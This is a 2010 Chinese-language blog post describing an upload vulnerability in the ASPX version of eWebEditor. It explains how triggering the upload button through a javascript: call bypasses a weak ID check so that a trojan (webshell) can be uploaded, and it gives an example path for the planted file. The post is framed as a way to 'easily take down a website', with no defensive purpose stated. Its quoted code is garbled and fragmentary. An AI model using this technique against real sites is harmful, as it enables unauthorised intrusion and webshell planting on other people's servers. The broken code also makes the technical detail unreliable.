技术文章/Article 订阅所有技术文章/Article的日志

eWebEditor .Net版本漏洞

作者:yezi 日期:2010-4-27 1:22:16

字体大小:

发布日期:2010-04-23
影响版本:ASPX版本
漏洞描述:eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。

原理:

代码 <form id="post" encType="server">
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">
只是简单的对ID进行验证
只要构造javascript:lbtnUpload.click();满足条件
达到上传木马的效果
成功以后查看源代码

代码 a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>
木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。

引用通告: 我要引用此文章
Tags: ewebeditor  漏洞  
相关日志:
  • ShopWind网店系统上传漏洞  (2010-4-12 8:12:25)
  • MS10-017 Microsoft Office Excel 中的漏洞  (2010-3-21 21:46:10)
  • MS10-016:Windows Movie Maker中的漏洞  (2010-3-21 21:45:31)
  • 脚本入侵之ewebeditor再次利用(曲折)取webshell  (2010-3-18 11:59:9)
  • EIMS 编辑器漏洞  (2010-3-17 4:1:39)
  • 瑞星2010年组合版最新漏洞(附演示动画)  (2010-3-3 16:39:44)
  • 黑洞的ASP上线系统的一个漏洞  (2010-3-2 7:15:46)
  • MSN Editor 漏洞  (2010-2-28 19:10:32)
  • 迅雷看看 3.1.0 AvtiveX控件信息泄露漏洞  (2010-1-8 21:35:53)
  • 8603音乐网管理系统 v2009.1001 0day  (2009-11-30 8:0:17)
    • 评论: 0 | 引用: 0 | 查看次数:
    发表评论
    昵 称:
    邮 箱:
    主 页:
    验证码:
    内 容:

    AD2's